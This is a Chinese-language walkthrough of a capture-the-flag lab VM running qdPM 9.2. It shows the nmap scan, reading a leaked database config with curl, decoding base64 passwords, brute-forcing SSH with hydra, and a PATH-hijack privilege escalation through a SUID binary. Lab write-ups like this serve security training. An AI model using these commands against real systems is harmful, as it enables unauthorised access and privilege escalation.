使用vb打开虚拟机,选择桥接模式,kali也选择桥接
开机后会出现靶机ip,ip会时不时的变,命令不行,记得看一下ip是否变了
先扫描一下开放了哪些端口
nmap -p- 172.16.2.41
访问80后发现是个登录页面
是一个框架系统,版本为9.2
在kali中搜索看看这个框架有没有漏洞
要登录的话,我们查看第二个漏洞,密码相关
下载查看
翻译
我们到这个网址查看,下载文件
curl http://ip/core/config/databases.yml
给出了mysql的账号和密码,前面也看到开放的端口有3306,也就是mysql服务启动了
尝试进入数据库 正常登录会提示证书不符,后面加一句跳过
mysql -h 172.16.2.47 -u qdpmadmin -p --skip-ssl
在staff中,找到了用户名密码
密码是经过加密的,我们去base64解密
c3VSSkFkR3dMcDhkeTNyRg==
N1p3VjRxdGc0MmNtVVhHWA==
WDdNUWtQM1cyOWZld0hkQw==
REpjZVZ5OThXMjhZN3dMZw==
Y3FObkJXQ0J5UzJEdUpTeQ==
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy
Smithucas
Travis
Dexter
Meyer
使用hydry爆破一下,先写两个文件user和passwd作为字典
hydra -L user -P pass ssh://172.16.2.54
22ssh host: 172.16.2.54 login: travis password: DJceVy98W28Y7wLg
22ssh host: 172.16.2.54 login: dexter password: 7ZwV4qtg42cmUXGX
登录一下
查看具有SetUID权限的可执行的文件
find / -perm -4000 2>/dev/null
使用strings命令查看一下get_access
发现cat命令提权
配置环境变量
echo "/bin/bash" > /tmp/cat
export PATH=/tmp:$PATH
chmod +x /tmp/cat
ehco $PATH
/opt/get_access
